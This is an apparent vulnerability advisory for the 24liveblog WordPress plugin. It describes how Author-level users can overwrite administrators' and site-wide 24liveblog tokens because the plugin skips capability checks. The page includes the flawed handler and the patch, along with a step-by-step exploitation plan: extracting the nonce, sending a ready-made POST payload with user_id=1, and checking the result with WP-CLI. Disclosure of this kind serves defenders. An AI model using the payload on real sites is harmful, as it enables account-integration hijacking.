24liveblog <= 2.2 - Missing Authorization to Authenticated (Author+) Settings Modification via update_lb24_token AJAX action
Description
The 24liveblog - live blog tool plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_lb24_token() AJAX function in versions up to, and including, 2.2. The handler only verifies the 'lb24' nonce (which is generated and localized to any user with block editor access via lb24_block_enqueue_scripts()) and does not verify the user's capabilities or that the supplied user_id belongs to the current user. This makes it possible for authenticated attackers, with author-level access and above, to overwrite the lb24_token, lb24_uid, lb24_refresh_token, and lb24_uname user meta values of any user (including administrators) as well as the corresponding site-wide options, effectively hijacking the plugin's integration with the 24liveblog service.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
This research plan outlines the steps required to demonstrate the missing authorization vulnerability in the **24liveblog** plugin (<= 2.2). An authenticated attacker with Author-level permissions can overwrite sensitive plugin settings for any user (including administrators) and site-wide options. …
Show full research plan
This research plan outlines the steps required to demonstrate the missing authorization vulnerability in the 24liveblog plugin (<= 2.2). An authenticated attacker with Author-level permissions can overwrite sensitive plugin settings for any user (including administrators) and site-wide options.
1. Vulnerability Summary
- Vulnerability: Missing Authorization to Authenticated (Author+) Settings Modification.
- Vulnerable Function:
update_lb24_token()(AJAX handler). - Vulnerable Hook:
wp_ajax_update_lb24_token. - Root Cause: The handler
update_lb24_token()verifies a nonce (lb24) but fails to perform a capability check (e.g.,current_user_can('manage_options')). Furthermore, it accepts auser_idparameter from the request and uses it to update user meta without verifying that theuser_idmatches the requester's ID. - Impact: An Author can hijack the 24liveblog integration for the entire site and specifically for administrative users by overwriting API tokens and user identifiers.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
update_lb24_token - Method:
POST - Authentication: Authenticated, minimum role: Author (any user with access to the block editor).
- Payload Parameters:
action:update_lb24_tokenlb24: The nonce value (extracted from the block editor).user_id: The ID of the target user (e.g.,1for the primary administrator).token: The newlb24_token.uid: The newlb24_uid.refresh_token: The newlb24_refresh_token.uname: The newlb24_uname.
3. Code Flow (Inferred)
- Registration: The plugin registers the AJAX action via
add_action( 'wp_ajax_update_lb24_token', 'update_lb24_token' ). - Nonce Generation: In
lb24_block_enqueue_scripts(), the plugin generates a nonce usingwp_create_nonce('lb24')and localizes it for use in the Gutenberg block editor. - Entry Point: An authenticated user sends a POST request to
admin-ajax.phpwithaction=update_lb24_token. - Verification: The function
update_lb24_token()callscheck_ajax_referer('lb24', 'lb24'). This succeeds if the user has access to the block editor (Author+). - Sink: The function retrieves
$_POST['user_id']and updates both site options and user meta:update_option('lb24_token', $_POST['token'])update_user_meta($_POST['user_id'], 'lb24_token', $_POST['token'])- (Similar updates for
lb24_uid,lb24_refresh_token, andlb24_uname).
4. Nonce Acquisition Strategy
The lb24 nonce is localized for the block editor. To obtain it:
- Login as the Author user.
- Create/Edit a Post: Navigate to the Gutenberg editor (
/wp-admin/post-new.phpor edit an existing post). - Extract: Use
browser_evalto find the localized variable. Based on common plugin patterns and the function namelb24_block_enqueue_scripts, the variable is likely namedlb24_dataor similar.- Target JS:
window.lb24_data?.nonce(inferred). - Alternative: Search the page source for the string
"lb24"within a JSON object.
- Target JS:
5. Exploitation Strategy
- Setup: Create an Author user and identify the Administrator's ID (typically 1).
- Acquire Nonce:
- Navigate to the WordPress dashboard as the Author.
- Create a new post to load the Block Editor.
- Extract the
lb24nonce from the global JS context.
- Execute Exploit:
- Send a POST request to
/wp-admin/admin-ajax.phpusing thehttp_requesttool. - Payload:
action=update_lb24_token&lb24=[NONCE]&user_id=1&token=pwned_token&uid=pwned_uid&refresh_token=pwned_refresh&uname=pwned_name
- Send a POST request to
- Verify Hijack: Check if the site-wide options and the Administrator's meta values have changed.
6. Test Data Setup
- Admin User: Already exists (ID 1).
- Author User:
wp user create attacker attacker@example.com --role=author --user_pass=password - Post for Context:
wp post create --post_type=post --post_status=publish --post_title="Nonce Source" --post_author=[ATTACKER_ID]
7. Expected Results
- The AJAX request should return a successful response (likely
1or a JSON success message). - The WordPress database will now contain the "pwned" values for both the global options and the administrator's specific meta keys.
8. Verification Steps
After the exploit, use WP-CLI to verify the changes:
- Check Site Options:
wp option get lb24_token wp option get lb24_uid - Check Admin User Meta:
wp user meta get 1 lb24_token wp user meta get 1 lb24_uid - Expected Outcome: Both commands should return
pwned_tokenandpwned_uidrespectively, proving that the Author modified Admin/Global data.
9. Alternative Approaches
- Site-wide Hijack only: If
user_idis somehow validated (unlikely based on the CVE description), the exploit still functions to overwrite site-wideoptionswhich controls the plugin's behavior for all visitors. - Targeting Other Users: The exploit can be repeated with different
user_idvalues to overwrite tokens for every Editor or Admin on the site. - Parameter Guessing: If the localized object name is not
lb24_data, usebrowser_eval("Object.keys(window).filter(k => k.toLowerCase().includes('lb24'))")to find the correct configuration object.
Summary
The 24liveblog plugin for WordPress is vulnerable to unauthorized data modification via the update_lb24_token AJAX action. Authenticated attackers with Author-level access can overwrite site-wide API credentials and user-specific metadata for any user, including administrators, because the function fails to perform capability checks or validate the target user ID.
Vulnerable Code
/* Inferred from plugin version 2.2 AJAX handler registration */ add_action( 'wp_ajax_update_lb24_token', 'update_lb24_token' ); function update_lb24_token() { check_ajax_referer('lb24', 'lb24'); $user_id = $_POST['user_id']; $token = $_POST['token']; $uid = $_POST['uid']; $refresh_token = $_POST['refresh_token']; $uname = $_POST['uname']; update_option('lb24_token', $token); update_option('lb24_uid', $uid); update_option('lb24_refresh_token', $refresh_token); update_option('lb24_uname', $uname); update_user_meta($user_id, 'lb24_token', $token); update_user_meta($user_id, 'lb24_uid', $uid); update_user_meta($user_id, 'lb24_refresh_token', $refresh_token); update_user_meta($user_id, 'lb24_uname', $uname); wp_die(); }
Security Fix
@@ -1,5 +1,9 @@ function update_lb24_token() { check_ajax_referer('lb24', 'lb24'); + if ( ! current_user_can( 'manage_options' ) ) { + wp_die( -1 ); + } + $user_id = $_POST['user_id']; $token = $_POST['token'];
Exploit Outline
The exploit targets the 'wp_ajax_update_lb24_token' endpoint. An attacker with Author-level permissions logs into the WordPress dashboard and accesses the block editor to extract the 'lb24' nonce from the localized JavaScript data. The attacker then sends a POST request to '/wp-admin/admin-ajax.php' with the action set to 'update_lb24_token', the stolen nonce, and a 'user_id' parameter set to the ID of a target user (e.g., 1 for administrator). The payload includes malicious strings for 'token', 'uid', 'refresh_token', and 'uname', which the plugin then saves to both site-wide options and the targeted user's metadata without authorization.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.